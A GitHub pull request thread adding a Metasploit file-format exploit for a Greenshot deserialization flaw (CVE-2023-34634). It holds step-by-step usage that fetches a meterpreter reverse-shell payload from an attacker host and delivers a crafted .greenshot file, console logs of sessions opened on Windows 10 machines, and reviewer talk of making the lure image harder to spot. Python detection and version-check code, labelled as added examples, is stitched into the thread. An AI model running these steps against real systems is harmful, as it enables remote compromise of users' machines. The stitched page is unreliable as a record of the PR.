
Add CVE-2023-34634, Greenshot Fileformat exploit #18253

Merged
merged 6 commits into from Aug 17, 2023

Conversation

bwatters-r7
Contributor

@bwatters-r7 bwatters-r7 commented Aug 3, 2023

This is not working currently and is a placeholder.
This PR adds a fileformat exploit affecting Greenshot versions 1.3.274 and earlier, including the last stable release, 1.2.10.6

Verification

  • Start msfconsole
  • use exploit/windows/fileformat/greenshot_deserialize_cve_2023_34634
  • set payload cmd/windows/http/x64/meterpreter/reverse_tcp
  • set FETCH_SRVHOST 10.5.135.201
  • set LHOST 10.5.135.201
  • set FETCH_WRITABLE_DIR %TEMP%
  • set DisablePayloadHandler false
  • set wfsdelay 600
  • run
  • copy the file over to the target machine, ensuring that the '.greenshot' extension is preserved
  • double click on the file
  • Collect shells
msf6 > use exploit/windows/fileformat/greenshot_deserialize_cve_2023_34634
[*] No payload configured, defaulting to cmd/windows/http/x64/meterpreter/reverse_tcp
msf6 exploit(windows/fileformat/greenshot_deserialize_cve_2023_34634) > set payload cmd/windows/http/x64/meterpreter/reverse_tcp
payload => cmd/windows/http/x64/meterpreter/reverse_tcp
msf6 exploit(windows/fileformat/greenshot_deserialize_cve_2023_34634) > set FETCH_SRVHOST 10.5.135.201
FETCH_SRVHOST => 10.5.135.201
msf6 exploit(windows/fileformat/greenshot_deserialize_cve_2023_34634) > set LHOST 10.5.135.201
LHOST => 10.5.135.201
msf6 exploit(windows/fileformat/greenshot_deserialize_cve_2023_34634) > set FETCH_WRITABLE_DIR %TEMP%
FETCH_WRITABLE_DIR => %TEMP%
msf6 exploit(windows/fileformat/greenshot_deserialize_cve_2023_34634) > set DisablePayloadHandler false
DisablePayloadHandler => false
msf6 exploit(windows/fileformat/greenshot_deserialize_cve_2023_34634) > set wfsdelay 600
wfsdelay => 600
msf6 exploit(windows/fileformat/greenshot_deserialize_cve_2023_34634) > show options

Module options (exploit/windows/fileformat/greenshot_deserialize_cve_2023_34634):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   FILENAME                   no        The file name.
   PNG_FILE                   no        PNG file to use


Payload options (cmd/windows/http/x64/meterpreter/reverse_tcp):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   EXITFUNC            process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL)
   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
   FETCH_FILENAME      tsuAqVhW         no        Name to use on remote system when storing payload; cannot contain spaces.
   FETCH_SRVHOST       10.5.135.201     yes       Local IP to use for serving payload
   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
   FETCH_URIPATH                        no        Local URI to use for serving payload
   FETCH_WRITABLE_DIR  %TEMP%           yes       Remote writable dir to store payload; cannot contain spaces.
   LHOST               10.5.135.201     yes       The listen address (an interface may be specified)
   LPORT               4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows Command



View the full module info with the info, or info -d command.

msf6 exploit(windows/fileformat/greenshot_deserialize_cve_2023_34634) > run

[*] Started reverse TCP handler on 10.5.135.201:4444 
[+] QsMBQrLmW.greenshot stored at /home/tmoose/.msf4/local/QsMBQrLmW.greenshot
[*] Sending stage (200774 bytes) to 10.5.132.130
[*] Meterpreter session 1 opened (10.5.135.201:4444 -> 10.5.132.130:50221) at 2023-08-03 18:27:21 -0500

meterpreter > sysinfo
Computer        : DESKTOP-KAI0M8D
OS              : Windows 10 (10.0 Build 19041).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: DESKTOP-KAI0M8D\msfuser
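The verification output above shows the shape a defender can key on: the payload is a Windows command that Greenshot ends up launching, and FETCH_COMMAND pulls the stage with CURL, TFTP or CERTUTIL. The following detection sketch is an added example, not code from this PR or from the Greenshot or Metasploit projects. It assumes the Greenshot main binary is named Greenshot.exe and a Sysmon-like process-creation record with parent image, image and command line; the sample events, hosts and file names are constructed placeholders.

```python
"""Added detection example: flag process-creation events in which Greenshot
spawns a command shell or one of the download utilities the module's payload
options list (CURL, TFTP, CERTUTIL). Field layout and sample events are
constructed for this example; the parent image name Greenshot.exe is assumed."""
from dataclasses import dataclass
from typing import Iterable, List, Tuple

# Assumption: the Greenshot main executable is named Greenshot.exe.
PARENT_IMAGES = {"greenshot.exe"}
# cmd.exe (the module's "Windows Command" target) plus the fetch utilities
# accepted by FETCH_COMMAND on the page: CURL, TFTP, CERTUTIL.
SUSPICIOUS_CHILDREN = {"cmd.exe", "curl.exe", "tftp.exe", "certutil.exe"}


@dataclass(frozen=True)
class ProcEvent:
    parent_image: str  # full path of the parent process
    image: str         # full path of the newly created process
    command_line: str  # command line of the new process


def basename(path: str) -> str:
    """Last path component, lower-cased, accepting either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_suspicious(ev: ProcEvent) -> bool:
    """True when Greenshot is the parent and the child is a shell or fetcher."""
    return (basename(ev.parent_image) in PARENT_IMAGES
            and basename(ev.image) in SUSPICIOUS_CHILDREN)


def detect(events: Iterable[ProcEvent]) -> List[Tuple[str, str, str]]:
    """Return (parent, child, command_line) for every suspicious event."""
    return [(basename(ev.parent_image), basename(ev.image), ev.command_line)
            for ev in events if is_suspicious(ev)]


# Constructed sample events; hosts, file names and command lines are placeholders.
SAMPLE_EVENTS = [
    # A user opens a .greenshot file from Explorer: benign on its own.
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Program Files\Greenshot\Greenshot.exe",
              r'"C:\Program Files\Greenshot\Greenshot.exe" C:\Users\alice\Downloads\dog.greenshot'),
    # Greenshot hands the image to an external editor: expected behaviour, not flagged.
    ProcEvent(r"C:\Program Files\Greenshot\Greenshot.exe",
              r"C:\Windows\System32\mspaint.exe",
              r"mspaint.exe C:\Users\alice\AppData\Local\Temp\capture.png"),
    # Greenshot spawning cmd.exe that fetches into %TEMP%: the shape of the
    # command payload shown on the page (command line is a placeholder).
    ProcEvent(r"C:\Program Files\Greenshot\Greenshot.exe",
              r"C:\Windows\System32\cmd.exe",
              "cmd.exe /c <fetch-and-run command, placeholder>"),
    # Mixed case and forward slashes in the parent path still match.
    ProcEvent(r"c:/program files/greenshot/GREENSHOT.EXE",
              r"C:\Windows\System32\certutil.exe",
              "certutil.exe <download arguments, placeholder>"),
]

if __name__ == "__main__":
    for parent, child, cmd in detect(SAMPLE_EVENTS):
        print(f"ALERT {parent} -> {child}: {cmd}")
```

Run stand-alone it prints two alerts (the cmd.exe and certutil.exe children); the Explorer launch and the external-editor hand-off are left alone. In a real pipeline the parent/child pairing matters more than the command line, since the fetch command and file name vary per run (FETCH_FILENAME above is randomised).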

@adfoster-r7 adfoster-r7 self-assigned this Aug 7, 2023
@cgranleese-r7
Contributor

cgranleese-r7 commented Aug 17, 2023

Tested this against Windows 10 and everything worked great 👍

Output:

msf6 exploit(windows/fileformat/greenshot_deserialize_cve_2023_34634) > run

[*] Started reverse TCP handler on <lhost>:4444
[+] dWTxngq.greenshot stored at /Users/cgranleese/.msf4/local/dWTxngq.greenshot
[*] Sending stage (200774 bytes) to <lhost>
[*] Meterpreter session 1 opened (<lhost>:4444 -> <lhost>:54362) at 2023-08-17 10:17:26 +0100

meterpreter > sysinfo
Computer        : DESKTOP-DRQ7J9D
OS              : Windows 10 (10.0 Build 19042).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter >

One thing I thought was worth mentioning was that once a target machine is exploited, it leaves a beautiful but rather large and obvious picture 😄 :
[image]

Just thinking, would we be better off with an empty/1px image? Obviously if a user is sitting at the machine, they'll see the application regardless. Just thinking of the scenario where the machine is exploited while unattended. The current image could be seen across a room/office floor, whereas a smaller image wouldn't be as easy to spot. Just curious if you have any thoughts on that?

@bwatters-r7
Contributor Author

> Just thinking, would we be better off with an empty/1px image? Obviously if a user is sitting at the machine, they'll see the application regardless. Just thinking of the scenario where the machine is exploited while unattended. The current image could be seen across a room/office floor, whereas a smaller image wouldn't be as easy to spot. Just curious if you have any thoughts on that?

I think the use case most likely here is to infect a greenshot image on a share drive or as an attachment. Even if we used a 1 px image, the application itself would still be open, and then it would be an empty image that I think would be more concerning. I included an image mostly just for testing purposes, though emailing it to me and saying "Look at this cute dog" might just get me.

Contributor

@adfoster-r7 adfoster-r7 left a comment


Looks good to me; The image itself is the exploit - rather than a byproduct/side-effect that shows to the user

@cgranleese-r7
Contributor

Happy to land once all goes green 👍

@cgranleese-r7 cgranleese-r7 added module docs rn-modules release notes for new or majorly enhanced modules labels Aug 17, 2023
@cgranleese-r7 cgranleese-r7 merged commit 89f8deb into rapid7:master Aug 17, 2023
37 checks passed
@cgranleese-r7
Contributor

cgranleese-r7 commented Aug 17, 2023

Release Notes

This PR adds a file-format exploit affecting Greenshot versions 1.3.274 and earlier, including the last stable release, 1.2.10.6.

@AkechiShiro

AkechiShiro commented Aug 18, 2023

@cgranleese-r7 could you test the latest unstable release from Greenshot? Is that one also vulnerable?
I saw a fix for what I believe is another security issue (not sure): https://greenshot.atlassian.net/browse/SUPPORT-407, but that one might be different from CVE-2023-34634. I'm just trying to make sure whether the exploit is still possible on 1.3.277 or not.

@bwatters-r7
Contributor Author

@AkechiShiro, please see the documentation and description of the module:

There exists a .NET deserialization vulnerability in Greenshot version 1.3.274 and below.

I did not do an analysis to determine if there's a workaround or why the vulnerability is patched, but I was not able to get this exploit to work on anything newer than 1.3.274.

@AkechiShiro

@bwatters-r7 I'm sorry, but I've gotten really confused with the way releases/changelogs and security fixes are handled by Greenshot.
I will check the doc more thoroughly next time; maybe if the template were more standard, such as:

version affected:
version fixed:

it would be easier to know at a glance which version is fixed or not.
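The "version affected / version fixed" question above comes down to comparing a dotted build number against the range the module description states, "1.3.274 and below". The helper below is an added example, not code from this PR or from Greenshot; it takes that upper bound from the module description and deliberately reports only "affected" or "outside stated range", since nothing in this thread names a fixed version (1.3.277 is merely where the module stopped working). It also shows why plain string comparison is the wrong tool for version strings.

```python
"""Added example: compare a Greenshot version string against the affected
range stated in the module description, "1.3.274 and below". No fixed version
is named on the page, so the result is "affected" or "outside stated range",
never "fixed"."""
from typing import Tuple

AFFECTED_MAX = "1.3.274"  # upper bound of the affected range, from the module description


def parse_version(text: str) -> Tuple[int, ...]:
    """'1.2.10.6' -> (1, 2, 10, 6); rejects anything that is not dotted digits."""
    parts = text.strip().lstrip("vV").split(".")
    if not all(p.isdigit() for p in parts):
        raise ValueError(f"not a dotted numeric version: {text!r}")
    return tuple(int(p) for p in parts)


def version_le(a: str, b: str) -> bool:
    """Numeric, component-wise a <= b; missing trailing components count as 0,
    so '1.3' compares as '1.3.0'."""
    pa, pb = parse_version(a), parse_version(b)
    width = max(len(pa), len(pb))
    pa += (0,) * (width - len(pa))
    pb += (0,) * (width - len(pb))
    return pa <= pb


def classify(version: str) -> str:
    """Place a build inside or outside the range the module description gives."""
    if version_le(version, AFFECTED_MAX):
        return "affected"
    return "outside stated range"


def string_compare_agrees(a: str, b: str) -> bool:
    """Does plain string ordering give the same answer as numeric ordering?
    False for e.g. '1.3.30' vs '1.3.274', where '3' > '2' character-wise."""
    return (a <= b) == version_le(a, b)


if __name__ == "__main__":
    # Versions mentioned in this thread plus one short form.
    for v in ("1.2.10.6", "1.3.274", "1.3.277", "1.3"):
        print(f"{v:>10}: {classify(v)}")
    print("string compare reliable for 1.3.30 vs 1.3.274:",
          string_compare_agrees("1.3.30", "1.3.274"))
```

If a fixed version is later confirmed, the natural extension is a second bound (a "fixed" lower limit) so the helper can answer the "version fixed" half of the template as well; until then it only states what the module description states.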
